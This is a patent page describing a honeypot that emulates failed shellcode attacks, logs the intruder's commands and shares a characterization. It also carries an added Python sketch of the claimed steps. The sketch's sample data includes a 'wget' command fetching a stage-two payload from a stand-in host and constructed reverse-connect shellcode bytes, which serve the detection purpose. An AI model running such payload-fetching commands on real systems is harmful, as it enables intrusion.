Emulating shellcode attacks
First Claim
1. A method comprising:
receiving, by a target system from an intruder system, a shellcode including executable and operational instructions effective, when executed, to cause vulnerable software to receive and execute instructions using the shellcode, the vulnerable software including at least one of a service and an application, the target system not hosting the vulnerable software;
detecting, by the target system, failure of installation of the shellcode on the target system; and
in response to detecting failure of installation of the shellcode on the target system, performing (a) through (g), wherein (a) through (g) include:
(a) identifying, by the target system, a type of the shellcode;
(b) selecting, by the target system, a shellcode emulator corresponding to the type of the shellcode, the target system not being vulnerable to the type of the shellcode;
(c) at least one of (i) binding the shellcode emulator to a port indicated by the shellcode and (ii) connecting the shellcode emulator to the intruder system;
(d) receiving, by the target system, instructions from the intruder system directed to the shellcode, the shellcode having failed to install on the target system;
(e) executing, by the target system, the instructions by the shellcode emulator effective to simulate successful installation of the shellcode;
(f) characterizing, by a detection system, behavior of the shellcode according to the instructions to generate a shellcode characterization; and
(g) transmitting, by the detection system, the characterization to a plurality of computer systems.
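As an added illustration of steps (a) through (g), not part of the patent or its specification, the following Python sketch classifies a received payload by the socket address embedded in it, stands up a matching emulator, records the instructions the intruder sends to the shell that never installed, and produces the characterization a detection system would share. The shellcode bytes, the intruder commands, the canned shell replies and the bind/reverse heuristic are all constructed assumptions, and the network bind or connect of step (c) is replaced by feeding the command lines in directly.

```python
# Added example (not the patent's own code): one honeypot-side pass through claim 1
# steps (a)-(g) on constructed shellcode bytes and intruder commands. identify_type()
# is a simplified heuristic; step (c)'s bind/connect is replaced by feeding lines in.
import socket
import struct

CANNED = {"id": "uid=0(root) gid=0(root)", "uname -a": "Linux emu 4.19.0 x86_64"}

def identify_type(shellcode: bytes) -> tuple[str, int, str]:
    """Step (a): classify bind vs. reverse from an embedded sockaddr_in, i.e.
    sin_family AF_INET (host order), network-order port, 4-byte IPv4 address."""
    marker = struct.pack("<H", socket.AF_INET)
    pos = shellcode.find(marker)
    while pos != -1 and pos + 8 <= len(shellcode):
        port = struct.unpack("!H", shellcode[pos + 2:pos + 4])[0]
        addr = socket.inet_ntoa(shellcode[pos + 4:pos + 8])
        if port:  # zero port is unusable; INADDR_ANY listens, anything else calls back
            return ("bind" if addr == "0.0.0.0" else "reverse", port, addr)
        pos = shellcode.find(marker, pos + 1)
    raise ValueError("no recognizable shellcode type")

class ShellEmulator:  # steps (b)-(e): stands in for the shell that failed to install
    def __init__(self, kind: str, port: int, addr: str):
        self.kind, self.port, self.addr, self.commands = kind, port, addr, []

    def execute(self, line: str) -> str:
        line = line.strip()
        if line:                       # blank keepalives are not commands
            self.commands.append(line)
        return CANNED.get(line, "")    # canned replies keep the intruder talking

def characterize(emu: ShellEmulator) -> dict:
    """Step (f): summarize the observed session into a shareable record."""
    fetches = [c.split()[-1] for c in emu.commands
               if c.split()[0] in ("wget", "curl", "tftp")]
    return {"type": emu.kind, "port": emu.port, "addr": emu.addr,
            "command_count": len(emu.commands), "downloads": fetches}

def emulate_session(shellcode: bytes, intruder_lines: list[str]) -> dict:
    """Runs (a)-(f) for one failed installation; the result is what (g) would send."""
    kind, port, addr = identify_type(shellcode)
    emu = ShellEmulator(kind, port, addr)
    for line in intruder_lines:
        emu.execute(line)
    return characterize(emu)

# Constructed sample: NOP filler around a sockaddr_in for 198.51.100.7:4444.
SAMPLE_SHELLCODE = (b"\x90" * 12 + struct.pack("<H", socket.AF_INET)
                    + struct.pack("!H", 4444) + socket.inet_aton("198.51.100.7"))
SAMPLE_COMMANDS = ["id", "uname -a", "wget http://198.51.100.7/stage2.bin"]
```

Calling `emulate_session(SAMPLE_SHELLCODE, SAMPLE_COMMANDS)` classifies the sample as a reverse-connect payload and lists the single download the intruder attempted; a payload whose embedded address is 0.0.0.0 is classified as a bind shell instead.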
3 Assignments
0 Petitions
Abstract
A system includes one or more “BotMagnet” modules that are exposed to infection by malicious code. The BotMagnets may include one or more virtual machines hosting operating systems in which malicious code may be installed and executed without exposing sensitive data or other parts of a network. In particular, outbound traffic may be transmitted to a Sinkhole module that implements a service requested by the outbound traffic and transmits responses to the malicious code executing within the BotMagnet. In the case of shellcode attacks, unsuccessful attacks may be emulated by selecting a corresponding emulator that will receive and execute instructions, as would a successful shellcode attack. Events occurring on the BotMagnet and Sinkhole are correlated and used to characterize the malicious code. The characterization may be transmitted to other computer systems in order to detect instances of the malicious code.
32 Citations
20 Claims
11. A system comprising one or more processors and one or more memory devices storing executable and operational code, the executable and operational code effective to cause the one or more processors to:
receive, from an intruder system, a shellcode including executable and operational instructions effective, when executed, to cause the target system to execute a shell for receiving and executing instructions on the target system;
determine failure of installation of the shellcode on the target system due to the target system not being vulnerable to the shellcode; and
in response to failure of installation of the shellcode on the target system performing (a) through (f), wherein (a) through (f) include:
(a) identify a type of the shellcode;
(b) select a shellcode emulator corresponding to the type of the shellcode;
(c) receive instructions from the intruder system directed to the shellcode, the shellcode not installed on the system;
(d) execute the instructions by the shellcode emulator;
(e) characterize behavior of the shellcode according to the instructions to generate a shellcode characterization; and
(f) transmit the characterization to a plurality of computer systems.
Specification